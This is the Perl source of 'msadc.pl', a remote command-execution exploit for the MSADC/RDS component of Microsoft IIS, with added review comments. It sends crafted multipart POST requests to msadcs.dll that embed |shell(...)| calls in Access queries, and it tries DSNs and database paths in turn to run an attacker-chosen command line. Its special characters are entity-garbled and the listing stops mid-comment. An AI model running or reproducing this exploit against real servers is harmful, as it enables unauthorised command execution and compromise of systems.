Msadc

#!/usr/bin/perl
#
# MSADC/RDS 'usage' (aka exploit) script version 2
#
# by rain forest puppy
#
# - added UNC support, really didn't clean up code, but oh well

use Socket; use Getopt::Std;
# Parse the switches into %args (Getopt::Std).  There is no `use strict`
# in this file, so %args and everything assigned below are package globals
# that every sub reads directly.  Without -h (a host) or -R (resume from
# rds.save) the usage text is printed and the script exits.
getopts("e:vd:h:XRVNwcu:s:", &l92;%args);

print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --&l92;n";

# NOTE(review): the usage text describes -e as "step 5", but the main flow
# below runs the UNC attempt (-u) as step 5 and the dictionary (-e) as
# step 6.  The string is left untouched here; only the wording disagrees.
if (!defined &l036;args&l123;h} && !defined &l036;args&l123;R}) &l123;
print qq~
Usage: msadc.pl -h <host> &l123; -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <&l92;&l92;&l92;&l92;host&l92;&l92;share&l92;&l92;file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>

Or a -R will resume a (v2) command session

~; exit;}

###########################################################
# config data

# Search lists consumed by the probing steps further down.  All of these are
# package globals; known_mdb shadows @drives with a shorter local copy.
# Drive letters tried in order by make_dsn, try_btcustmr and known_mdb.
@drives=("c","d","e","f","g","h");

# Candidate Windows system-directory names tried under each drive letter.
@sysdirs=("winnt","winnt35","winnt351","win","windows");

l we want &l039;wicca&l039; first, because if step 2 made the DSN, it&l039;s ready to go
# DSN names tried by known_dsn (step 3); "wicca" is the name make_dsn creates.
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");

l this is sparse, because I don&l039;t know of many
# .mdb paths relative to <drive>:\<sysdir> (see the trailing comment).
@sysmdbs=( "&l92;&l92;catroot&l92;&l92;icatalog.mdb",
"&l92;&l92;help&l92;&l92;iishelp&l92;&l92;iis&l92;&l92;htm&l92;&l92;tutorial&l92;&l92;eecustmr.mdb",
"&l92;&l92;system32&l92;&l92;help&l92;&l92;iishelp&l92;&l92;iis&l92;&l92;htm&l92;&l92;tutorial&l92;&l92;eecustmr.mdb",
"&l92;&l92;system32&l92;&l92;certmdb.mdb",
"&l92;&l92;system32&l92;&l92;ias&l92;&l92;ias.mdb",
"&l92;&l92;system32&l92;&l92;ias&l92;dnary.mdb",
"&l92;&l92;system32&l92;&l92;certlog&l92;&l92;certsrv.mdb" ); lthese are %systemroot%
# .mdb paths relative to the drive root; known_mdb prefixes "<drive>:" only.
@mdbs=( "&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;cfappman&l92;&l92;data&l92;&l92;applications.mdb",
"&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;forums&l92;&l92;forums_.mdb",
"&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;forums&l92;&l92;data&l92;&l92;forums.mdb",
"&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;security&l92;&l92;realm_.mdb",
"&l92;&l92;cfusion&l92;&l92;cfapps&l92;&l92;security&l92;&l92;data&l92;&l92;realm.mdb",
"&l92;&l92;cfusion&l92;&l92;database&l92;&l92;cfexamples.mdb",
"&l92;&l92;cfusion&l92;&l92;database&l92;&l92;cfsnippets.mdb",
"&l92;&l92;inetpub&l92;&l92;iissamples&l92;&l92;sdk&l92;&l92;asp&l92;&l92;database&l92;&l92;authors.mdb",
"&l92;&l92;progra~1&l92;&l92;common~1&l92;&l92;system&l92;&l92;msadc&l92;&l92;samples&l92;&l92;advworks.mdb",
"&l92;&l92;cfusion&l92;&l92;brighttiger&l92;&l92;database&l92;&l92;cleam.mdb",
"&l92;&l92;cfusion&l92;&l92;database&l92;&l92;smpolicy.mdb",
"&l92;&l92;cfusion&l92;&l92;database&l92;cypress.mdb",
"&l92;&l92;progra~1&l92;&l92;ableco~1&l92;&l92;ablecommerce&l92;&l92;databases&l92;&l92;acb2_main1.mdb",
"&l92;&l92;website&l92;&l92;cgi-win&l92;&l92;dbsample.mdb",
"&l92;&l92;perl&l92;&l92;prk&l92;&l92;bookexamples&l92;&l92;modsamp&l92;&l92;database&l92;&l92;contact.mdb",
"&l92;&l92;perl&l92;&l92;prk&l92;&l92;bookexamples&l92;&l92;utilsamp&l92;&l92;data&l92;&l92;access&l92;&l92;prk.mdb"
); lthese are just &l92;
lllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# ---- main flow -------------------------------------------------------------
# Globals shared with the subs below: $ip (host from -h), $target (packed
# address), $clen/$reqlen (HTTP body lengths, recomputed before each
# request), $verbose, $comm (shell prefix) and $command (line read from
# STDIN).  $|=1 makes STDOUT unbuffered so progress dots appear immediately.
&l036;ip=&l036;args&l123;h}; &l036;clen=0; &l036;reqlen=0; &l036;|=1; &l036;target="";
if (defined &l036;args&l123;v}) &l123; &l036;verbose=1; } else &l123;&l036;verbose=0;}
# NOTE(review): $delay is parsed here but no sub in this listing reads it;
# the only pause is the fixed sleep(3) after step 2.
if (defined &l036;args&l123;d}) &l123; &l036;delay=&l036;args&l123;d};} else &l123;&l036;delay=1;}
# Resolve the host unless resuming (-R), then confirm that the DLL answers.
# has_msadc exits the script itself on a negative result; $ret is never
# examined.  `&has_msadc;` (no parens) also passes the current @_ along.
if(!defined &l036;args&l123;R})&l123; &l036;target= inet_aton(&l036;ip)
|| die("inet_aton problems; host doesn&l039;t exist?");}
if (!defined &l036;args&l123;R})&l123; &l036;ret = &has_msadc; }

# -X, -N and -R are one-shot modes: each runs its sub and exits.
if (defined &l036;args&l123;X}) &l123; &hork_idx; exit; }
if (defined &l036;args&l123;N}) &l123; &get_name; exit; }

# -w selects the Windows 9x shell prefix; the resume path (load) repeats
# this same prompt logic on its own.
if (defined &l036;args&l123;w})&l123;&l036;comm="command /c";} else &l123;&l036;comm="cmd /c";}
if (defined &l036;args&l123;R}) &l123; &load; exit; }

# The rest of the command line comes from STDIN and is kept in the global
# $command, which make_req interpolates into its queries.
print "Type the command line you want to run (&l036;comm assumed):&l92;n"
. "&l036;comm ";
&l036;in=<STDIN>; chomp &l036;in;
&l036;command="&l036;comm " . &l036;in ;

# Steps 1-6 run in order unless -s <n> restricts the run to one step.  Each
# step sub calls save() and exit on success, so falling through to the
# final "No luck" line means every step failed.
if (!defined &l036;args&l123;s} || &l036;args&l123;s}==1)&l123;
print "&l92;nStep 1: Trying raw driver to btcustmr.mdb&l92;n";
&try_btcustmr;}

if (!defined &l036;args&l123;s} || &l036;args&l123;s}==2)&l123;
print "&l92;nStep 2: Trying to make our own DSN...";
if (&make_dsn)&l123; print "<<success>>&l92;n"; sleep(3); } else &l123;
print "<<fail>>&l92;n"; }} l we need to sleep to let the server catchup

if (!defined &l036;args&l123;s} || &l036;args&l123;s}==3)&l123;
print "&l92;nStep 3: Trying known DSNs...";
&known_dsn;}

if (!defined &l036;args&l123;s} || &l036;args&l123;s}==4)&l123;
print "&l92;nStep 4: Trying known .mdbs...";
&known_mdb;}

if (!defined &l036;args&l123;s} || &l036;args&l123;s}==5)&l123;
if (defined &l036;args&l123;u})&l123;
# NOTE(review): "\xStep 5" starts with a \x escape that is not followed by
# hex digits, so this does not print the newline the other steps use;
# "\nStep 5" was presumably intended.
print "&l92;xStep 5: Trying UNC...";
# NOTE(review): the "No -u; Step 5 skipped." string below is a bare
# expression in void context - the `print` is missing, so it is never
# shown.  The step 6 "No -e" branch has the same omission.
&use_unc; } else &l123; "&l92;nNo -u; Step 5 skipped.&l92;n"; }}

if (!defined &l036;args&l123;s} || &l036;args&l123;s}==6)&l123;
if (defined &l036;args&l123;e})&l123;
print "&l92;nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else &l123; "&l92;nNo -e; Step 6 skipped.&l92;n"; }}

print "&l92;n&l92;nNo luck, guess you&l039;ll have to use a real hack, eh?&l92;n";
exit;

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Open a TCP connection to port 80 of $target (the address packed by
# inet_aton at top level; AF_INET=2 and the port are hand-packed into the
# sockaddr), write $pstr, and collect every response line into @in, which
# is returned.  The raw reply is also copied to ./raw.out (overwritten on
# each call) and, under -X, a "." is echoed per line as a progress mark.
# Dies if the socket cannot be created or the connect fails.
# NOTE(review): bareword handles S/OUT, an unchecked 2-arg open of raw.out,
# and select(S) switching the default output handle (restored on the close
# line) are all pre-strict idioms; sockaddr_in from Socket would replace
# the manual pack.
sub sendraw &l123; l this saves the whole transaction anyway
my (&l036;pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(&l039;tcp&l039;)||0) ||
die("Socket problems&l92;n");
if(connect(S,pack "SnA4x8",2,80,&l036;target))&l123;
open(OUT,">raw.out"); my @in;
select(S); &l036;|=1; print &l036;pstr;
while(<S>)&l123; print OUT &l036;_; push @in, &l036;_;
print STDOUT "." if(defined &l036;args&l123;X});}
close(OUT); select(STDOUT); close(S); return @in;
} else &l123; die("Can&l039;t connect...&l92;n"); }}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Build the HTTP/1.1 POST header, plus the first multipart section header,
# for an RDS call to msadcs.dll.  With -V the VbBusObj GetRecordset entry
# point is addressed with num-args=2; otherwise AdvancedDataFactory.Query
# with num-args=3.  $ip, $clen and $reqlen are package globals the caller
# must set beforehand (see try_btcustmr, create_table, run_query, ...).
# Bare newlines in the heredoc are converted to CRLF before returning.
# NOTE(review): `my $aa, $bb;` declares only $aa as a lexical - without
# parentheses `my` applies to the first term only, so $bb is a global.
sub make_header &l123; l make the HTTP request
my &l036;aa, &l036;bb;
if (defined &l036;args&l123;V})&l123;
&l036;aa="VbBusObj.VbBusObjCls.GetRecordset";
&l036;bb="2";
} else &l123;
&l036;aa="AdvancedDataFactory.Query";
&l036;bb="3";}

&l036;msadc=<<EOT
POST /msadc/msadcs.dll/&l036;aa HTTP/1.1
User-Agent: ACTIVEDATA
Host: &l036;ip
Content-Length: &l036;clen
Connection: Keep-Alive

ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=&l036;bb

--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: &l036;reqlen

EOT
;
&l036;msadc=~s/&l92;n/&l92;r&l92;n/g;
return &l036;msadc;}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Build the x-varg body for one RDS call.  $switch selects the query/DSN
# pair: 1 = btcustmr.mdb under $p1:\$p2, 2 = create table AZZ in DSN $p1,
# 3 = query table AZZ, 4 = Index Server path listing (Provider=MSIDXS),
# 5 = a deliberately malformed query used by is_access, 6 = the
# table-independent MSysModules query.  The global $command is
# interpolated into the queries for switches 1, 3 and 6.  Query and DSN
# are widened with make_unicode, each prefixed by a 16-bit length, and the
# closing multipart boundary is appended.  Under -V the leading
# "\x02\x00\x03\x00" argument header is omitted.
# NOTE(review): as in make_header, `my $t1, $t2, $query, $dsn;` makes only
# $t1 lexical; the others are globals.  pack("S1", ...) is host byte order,
# so the length prefix is little-endian only on little-endian hosts.
sub make_req &l123; l make the RDS request
my (&l036;switch, &l036;p1, &l036;p2)=@_;
my &l036;req=""; my &l036;t1, &l036;t2, &l036;query, &l036;dsn;

if (&l036;switch==1)&l123; l this is the btcustmr.mdb query
&l036;query="Select * from Customers where City=&l039;|shell(&l92;"&l036;command&l92;")|&l039;";
&l036;dsn="driver=&l123;Microsoft Access Driver (*.mdb)};dbq=" .
&l036;p1 . ":&l92;&l92;" . &l036;p2 . "&l92;&l92;help&l92;&l92;iis&l92;&l92;htm&l92;&l92;tutorial&l92;&l92;btcustmr.mdb;";}

elsif (&l036;switch==2)&l123; l this is general make table query
&l036;query="create table AZZ (B int, C varchar(10))";
&l036;dsn="&l036;p1";}

elsif (&l036;switch==3)&l123; l this is general exploit table query
&l036;query="select * from AZZ where C=&l039;|shell(&l92;"&l036;command&l92;")|&l039;";
&l036;dsn="&l036;p1";}

elsif (&l036;switch==4)&l123; l attempt to hork file info from index server
&l036;query="select path from scope()";
&l036;dsn="Provider=MSIDXS;";}

elsif (&l036;switch==5)&l123; l bad query
&l036;query="select";
&l036;dsn="&l036;p1";}

elsif (&l036;switch==6)&l123; l this is table-independant query (new)
&l036;query="select * from MSysModules where name=&l039;|shell(&l92;"&l036;command&l92;")|&l039;";
&l036;dsn="&l036;p1";}

&l036;t1= make_unicode(&l036;query);
&l036;t2= make_unicode(&l036;dsn);
if(defined &l036;args&l123;V}) &l123; &l036;req=""; } else &l123;&l036;req = "&l92;x02&l92;x00&l92;x03&l92;x00"; }
&l036;req.= "&l92;x08&l92;x00" . pack ("S1", length(&l036;t1));
&l036;req.= "&l92;x00&l92;x00" . &l036;t1 ;
&l036;req.= "&l92;x08&l92;x00" . pack ("S1", length(&l036;t2));
&l036;req.= "&l92;x00&l92;x00" . &l036;t2 ;
&l036;req.="&l92;r&l92;n--!ADM!ROX!YOUR!WORLD!--&l92;r&l92;n";
return &l036;req;}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Widen a byte string by appending a NUL after every character.  For 7-bit
# ASCII input this is equivalent to UTF-16LE; no real transcoding is done,
# so non-ASCII input would not be encoded correctly.
# NOTE(review): the loop counter $c is not declared with `my` and so is a
# global; `join '', map { "$_\x00" } split //, $in` would avoid the index
# loop.
sub make_unicode &l123; l quick little function to convert to unicode
my (&l036;in)=@_; my &l036;out;
for (&l036;c=0; &l036;c < length(&l036;in); &l036;c++) &l123; &l036;out.=substr(&l036;in,&l036;c,1) . "&l92;x00"; }
return &l036;out;}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Heuristic success test on a raw response (the author calls it a kludge):
# locate the body with content_start; if the first body line carries a
# multipart/mixed content type, a 0x09 0x00 prefix ten lines further on is
# taken as success.  Returns 1 on success, 0 otherwise.
# NOTE(review): when content_start returns -1 the indices wrap to
# negative offsets from the end of @in; the result is then meaningless but
# no error is raised.
sub rdo_success &l123; l checks for RDO return success (this is kludge)
my (@in) = @_; my &l036;base=content_start(@in);
if(&l036;in[&l036;base]=~/multipart&l92;/mixed/)&l123;
return 1 if( &l036;in[&l036;base+10]=~/^&l92;x09&l92;x00/ );}
return 0;}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Step 2: for each letter in @drives, GET /scripts/tools/newdsn.exe asking
# it to create a DSN named "wicca" backed by <drive>:\sys.mdb.  Returns 0
# as soon as the status line is a 404 (the tool is absent), 1 when a 200
# response contains "Datasource creation successful", and 0 after all
# drives are exhausted.
# NOTE(review): $2 is read without checking that the status-line match
# succeeded, so a malformed first line would reuse a stale capture; a
# named capture tested inside `if` would be safer.  $drive and $line are
# undeclared loop globals.
sub make_dsn &l123; l this (tries to) make a DSN for us
print "&l92;nMaking DSN: ";
foreach &l036;drive (@drives) &l123;
print "&l036;drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft&l92;%2B" .
"Access&l92;%2BDriver&l92;%2B&l92;%28*.mdb&l92;%29&l92;&dsn=wicca&l92;&dbq="
. &l036;drive . "&l92;%3A&l92;%5Csys.mdb&l92;&newdb=CREATE_DB&l92;&attr= HTTP/1.0&l92;n&l92;n");
&l036;results[0]=~mlHTTP&l92;/([0-9&l92;.]+) ([0-9]+) ([^&l92;n]*)l;
return 0 if &l036;2 eq "404"; l not found/doesn&l039;t exist
if(&l036;2 eq "200") &l123;
foreach &l036;line (@results) &l123;
return 1 if &l036;line=~/<H2>Datasource creation successful<&l92;/H2>/;}}
} return 0;}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Issue a plain HTTP/1.0 GET for $page and return only the status line.
# NOTE(review): nothing in this listing calls verify_exists; it appears to
# be dead code left over from an earlier version.
sub verify_exists &l123;
my (&l036;page)=@_;
my @results=sendraw("GET &l036;page HTTP/1.0&l92;n&l92;n");
return &l036;results[0];}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Step 1: for each system-directory name in @sysdirs and each letter in
# @drives, send the switch-1 request (raw Access driver pointed at
# <drive>:\<dir>\help\iis\htm\tutorial\btcustmr.mdb).  On the first
# rdo_success the dbq string is written with save() and the script exits;
# otherwise the ODBC error is shown under -v and funky() aborts the run on
# replies that make further attempts pointless.  $reqlen/$clen are
# recomputed before every make_header call; 28 and 206 are header-size
# constants the author never explains.
# NOTE(review): these three bookkeeping lines are repeated verbatim in
# create_table, is_access, run_query and hork_idx; a small helper that
# takes the switch and returns the assembled request would remove the
# duplication.  $dir and $drive are undeclared loop globals.
sub try_btcustmr &l123;

foreach &l036;dir (@sysdirs) &l123;
print "&l036;dir -> "; l fun status so you can see progress
foreach &l036;drive (@drives) &l123;
print "&l036;drive: "; l ditto
&l036;reqlen=length( make_req(1,&l036;drive,&l036;dir) ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;

my @results=sendraw(make_header() . make_req(1,&l036;drive,&l036;dir));
if (rdo_success(@results))&l123;print "Success!&l92;n";

save("dbq=".&l036;drive.":&l92;&l92;".&l036;dir."&l92;&l92;help&l92;&l92;iis&l92;&l92;htm&l92;&l92;tutorial&l92;&l92;btcustmr.mdb;");
exit;}
else &l123; verbose(odbc_error(@results)); funky(@results);}} print "&l92;n";}}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Extract the ODBC error text from a raw response: when the first body line
# (located by content_start) is application/x-varg, strip every character
# outside a small allowed set from body lines 4-6 and return their
# concatenation.  Any other body is printed as a "NON-STANDARD error" and
# the script exits.  @in is a copy, so the substitutions do not touch the
# caller's array.
# NOTE(review): `my $base;` immediately followed by `my $base = ...`
# redeclares the same lexical (a "masks earlier declaration" warning under
# `use warnings`); the first declaration is redundant.
sub odbc_error &l123;
my (@in)=@_; my &l036;base;
my &l036;base = content_start(@in);
if(&l036;in[&l036;base]=~/application&l92;/x-varg/)&l123; l it *SHOULD* be this
&l036;in[&l036;base+4]=~s/[^a-zA-Z0-9 &l92;[&l92;]&l92;:&l92;/&l92;&l92;&l039;&l92;(&l92;)]//g;
&l036;in[&l036;base+5]=~s/[^a-zA-Z0-9 &l92;[&l92;]&l92;:&l92;/&l92;&l92;&l039;&l92;(&l92;)]//g;
&l036;in[&l036;base+6]=~s/[^a-zA-Z0-9 &l92;[&l92;]&l92;:&l92;/&l92;&l92;&l039;&l92;(&l92;)]//g;
return &l036;in[&l036;base+4].&l036;in[&l036;base+5].&l036;in[&l036;base+6];}
print "&l92;nNON-STANDARD error. Please sent this info to rfp&l92;@wiretrip.net:&l92;n";
print "&l036;in : " . &l036;in[&l036;base] . &l036;in[&l036;base+1] . &l036;in[&l036;base+2] . &l036;in[&l036;base+3] .
&l036;in[&l036;base+4] . &l036;in[&l036;base+5] . &l036;in[&l036;base+6]; exit;}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Print $in on its own line when -v was given (global $verbose set at top
# level); silently return otherwise.
sub verbose &l123;
my (&l036;in)=@_;
return if !&l036;verbose;
print STDOUT "&l92;n&l036;in&l92;n";}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Persist the parameters of a successful session to ./rds.save
# (overwritten): a "v2" marker line, the host, the c/V/w switches that were
# active, and the DSN or dbq string $p1.  load() reads this back for -R.
# NOTE(review): when the open fails only a message is printed and the
# subsequent prints still run against the unopened bareword handle OUT;
# `open my $out, '>', 'rds.save' or return` would make the failure
# explicit.
sub save &l123;
my (&l036;p1)=@_; my &l036;ropt="";
open(OUT, ">rds.save") || print "Problem saving parameters...&l92;n";
if (defined &l036;args&l123;c})&l123; &l036;ropt="c ";}
if (defined &l036;args&l123;V})&l123; &l036;ropt.="V ";}
if (defined &l036;args&l123;w})&l123; &l036;ropt.="w ";}
print OUT "v2&l92;n&l036;ip&l92;n&l036;ropt&l92;n&l036;p1&l92;n";
close OUT;}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# -R resume path: read ./rds.save as written by save(), restore $ip and
# $target, re-enable the recorded switches in %args, prompt for a command
# line exactly as the top level does, then replay run_query against the
# saved DSN/dbq string (prefixing the Access driver clause when the string
# starts with "dbq").  Always exits.
# NOTE(review): $action is unpacked from @_ but never used.  @switches,
# $torun, $in and $command are globals, and the "c" switch is forced on
# for btcustmr targets, as the inline comment admits.  The "Wrong version"
# check compares against "v2\n" and so assumes LF line endings in the file.
sub load &l123;
my (&l036;action)=@_;
my @p; my &l036;drvst="driver=&l123;Microsoft Access Driver (*.mdb)};";
open(IN,"<rds.save") || die("Couldn&l039;t open rds.save&l92;n");
@p=<IN>; close(IN);
die("Wrong rds.save version") if &l036;p[0] ne "v2&l92;n";
&l036;ip="&l036;p[1]"; &l036;ip=~s/&l92;n//g;
&l036;target= inet_aton(&l036;ip) || die("inet_aton problems");
print "Resuming to &l036;ip ...";
@switches=split(/ /,&l036;p[2]);
foreach &l036;switch (@switches) &l123;
&l036;args&l123;&l036;switch}="1";}

if (defined &l036;args&l123;w})&l123;&l036;comm="command /c";} else &l123;&l036;comm="cmd /c";}
print "Type the command line you want to run (&l036;comm assumed):&l92;n"
. "&l036;comm ";
&l036;in=<STDIN>; chomp &l036;in;
&l036;command="&l036;comm " . &l036;in ;

&l036;torun="&l036;p[3]"; &l036;torun=~s/&l92;n//g;
if(&l036;torun=~/btcustmr/)&l123;
&l036;args&l123;&l039;c&l039;}="1";} l this is a kludge to make it work

if(&l036;torun=~/^dbq/)&l123; &l036;torun=&l036;drvst.&l036;torun; }

if(run_query("&l036;torun"))&l123;
print "Success!&l92;n";} else &l123; print "failed&l92;n"; }
exit;}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Try to create table AZZ through the DSN/dbq string $in (switch 2).
# Returns 1 without sending anything unless -c (v1 three-step mode) was
# given, and also whenever -V is set; otherwise returns 1 on rdo_success
# or when the ODBC error says the table already exists, and 0 on any
# other error (which is shown under -v).
# NOTE(review): unpacking @_ after two early returns is legal but easy to
# misread; the $reqlen/$clen bookkeeping is the same three lines as in
# try_btcustmr.
sub create_table &l123;
return 1 if (!defined &l036;args&l123;c});
return 1 if (defined &l036;args&l123;V});
my (&l036;in)=@_;
&l036;reqlen=length( make_req(2,&l036;in,"") ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(2,&l036;in,""));
return 1 if rdo_success(@results);
my &l036;temp= odbc_error(@results); verbose(&l036;temp);
return 1 if &l036;temp=~/Table &l039;AZZ&l039; already exists/;
return 0;}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Step 3: walk the @dsns list; for each name that is_access accepts, call
# create_table and then run_query.  The first success writes
# save("dsn=...") and exits; otherwise one dot per name is printed and the
# sub returns after a newline.
# NOTE(review): $dSn is an undeclared loop global with an unusual
# mixed-case name; dsn_dict repeats this same three-call sequence.
sub known_dsn &l123;
foreach &l036;dSn (@dsns) &l123;
print ".";
next if (!is_access("DSN=&l036;dSn"));
if(create_table("DSN=&l036;dSn"))&l123;
if(run_query("DSN=&l036;dSn"))&l123;
print "&l036;dSn: Success!&l92;n"; save ("dsn=&l036;dSn"); exit; }}} print "&l92;n";}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Send the deliberately malformed switch-5 query through $in and decide
# from the ODBC error text whether the backend is Microsoft Access.
# Skipped (returns 1) unless -c was given, and also whenever -V is set.
# Returns 1 when the error mentions "Microsoft Access", 0 otherwise.
# NOTE(review): odbc_error may itself exit the script on a non-standard
# reply, so a 0 return is not the only failure outcome here.
sub is_access &l123;
my (&l036;in)=@_;
return 1 if (!defined &l036;args&l123;c});
return 1 if (defined &l036;args&l123;V});
&l036;reqlen=length( make_req(5,&l036;in,"") ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(5,&l036;in,""));
my &l036;temp= odbc_error(@results);
verbose(&l036;temp); return 1 if (&l036;temp=~/Microsoft Access/);
return 0;}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Send the command-carrying query through the DSN/dbq string $in: switch 3
# (table AZZ, created by create_table) under -c, otherwise switch 6 (the
# table-independent MSysModules form).  Returns 1 on rdo_success; else
# shows the ODBC error under -v and returns 0.
sub run_query &l123;
my (&l036;in)=@_; my &l036;req;
if (defined &l036;args&l123;c})&l123;&l036;req=3;} else &l123;&l036;req=6;}
&l036;reqlen=length( make_req(&l036;req,&l036;in,"") ) - 28;

&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(&l036;req,&l036;in,""));
return 1 if rdo_success(@results);
my &l036;temp= odbc_error(@results); verbose(&l036;temp);
return 0;}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Step 4: first try every @sysmdbs path under <drive>:\<sysdir>, then every
# @mdbs path directly under <drive>:, each via create_table followed by
# run_query with the Access driver clause prepended.  The first success
# writes save("dbq=...") and exits; otherwise progress dots are printed
# and the sub returns.
# NOTE(review): the local @drives drops "h" from the global list; @dirs is
# declared but the loop iterates the global @sysdirs instead; and
# `my $dir, $drive, $mdb;` makes only $dir lexical.  The driver string here
# has a space after the ";" that the other copies of it lack.
sub known_mdb &l123;
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my &l036;dir, &l036;drive, &l036;mdb;
my &l036;drv="driver=&l123;Microsoft Access Driver (*.mdb)}; dbq=";

foreach &l036;drive (@drives) &l123;
foreach &l036;dir (@sysdirs)&l123;
foreach &l036;mdb (@sysmdbs) &l123;
print ".";
if(create_table(&l036;drv.&l036;drive.":&l92;&l92;".&l036;dir.&l036;mdb))&l123;
if(run_query(&l036;drv . &l036;drive . ":&l92;&l92;" . &l036;dir . &l036;mdb))&l123;
print "&l036;mdb: Success!&l92;n"; save ("dbq=".&l036;drive .":&l92;&l92;".&l036;dir.&l036;mdb); exit;
}}}}}

foreach &l036;drive (@drives) &l123;
foreach &l036;mdb (@mdbs) &l123;
print ".";
if(create_table(&l036;drv.&l036;drive.":".&l036;mdb))&l123;
if(run_query(&l036;drv.&l036;drive.":".&l036;mdb))&l123;
print "&l036;mdb: Success!&l92;n"; save ("dbq=".&l036;drive.":".&l036;mdb); exit;
}}}}
}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# -X: send the switch-4 request (Provider=MSIDXS, "select path from
# scope()") and print the distinct <drive>:\<first-dir> prefixes found in
# the response from line 19 onward, after stripping NULs and non-path
# characters.  Prints a failure message when rdo_success is false.
# NOTE(review): $1/$2 are read without testing that the match succeeded,
# so a line with no drive prefix repeats the previous captures into %d;
# 19 is a fixed offset rather than a value derived from content_start().
sub hork_idx &l123;
print "&l92;nAttempting to dump Index Server tables...&l92;n";
print " NOTE: Sometimes this takes a while, other times it stalls&l92;n&l92;n";
&l036;reqlen=length( make_req(4,"","") ) - 28;
&l036;reqlenlen=length( "&l036;reqlen" );
&l036;clen= 206 + &l036;reqlenlen + &l036;reqlen;
my @results=sendraw(make_header() . make_req(4,"",""));
if (rdo_success(@results))&l123;
my &l036;max=@results; my &l036;c; my %d;
for(&l036;c=19; &l036;c<&l036;max; &l036;c++)&l123;
&l036;results[&l036;c]=~s/&l92;x00//g;
&l036;results[&l036;c]=~s/[^a-zA-Z0-9:~ &l92;&l92;&l92;._]&l123;1,40}/&l92;n/g;
&l036;results[&l036;c]=~s/[^a-zA-Z0-9:~ &l92;&l92;&l92;._&l92;n]//g;
&l036;results[&l036;c]=~/([a-zA-Z]&l92;:&l92;&l92;)([a-zA-Z0-9 _~&l92;&l92;]+)&l92;&l92;/;
&l036;d&l123;"&l036;1&l036;2"}="";}
foreach &l036;c (keys %d)&l123; print "&l036;c&l92;n"; }
} else &l123;print "Index server not installed/query failed&l92;n"; }}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Step 6 (-e FILE): read DSN names one per line from the dictionary file,
# strip CR/LF, and run the same is_access / create_table / run_query
# sequence as known_dsn.  The first success saves and exits; otherwise a
# dot per name is printed and the file is closed.
# NOTE(review): 2-arg open with an interpolated path and a bareword IN
# handle - prefer `open my $dict, '<', $args{e} or die ...`.  $hold and
# $dSn are globals, and the s///g strips CR/LF anywhere in the line, not
# just at the end.
sub dsn_dict &l123;
open(IN, "<&l036;args&l123;e}") || die("Can&l039;t open external dictionary&l92;n");
while(<IN>)&l123;
&l036;hold=&l036;_; &l036;hold=~s/[&l92;r&l92;n]//g; &l036;dSn="&l036;hold"; print ".";
next if (!is_access("DSN=&l036;dSn"));
if(create_table("DSN=&l036;dSn"))&l123;
if(run_query("DSN=&l036;dSn"))&l123;
print "Success!&l92;n"; save ("dsn=&l036;dSn"); exit; }}}
print "&l92;n"; close(IN);}

llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll

# Return the index in @in of the first body line.  Starting at element 1
# (element 0 is the status line), scan up to 500 lines for the first bare
# CRLF; if the line after it is another "HTTP/1.x 100" or "200" status
# line (an interim response) skip past it and keep scanning.  Returns -1
